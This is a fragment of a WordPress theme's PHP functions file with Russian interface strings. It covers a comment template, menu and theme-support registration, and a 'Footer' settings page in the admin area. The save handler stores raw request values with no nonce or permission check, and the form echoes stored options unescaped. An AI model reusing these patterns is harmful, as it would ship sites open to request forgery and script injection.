    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
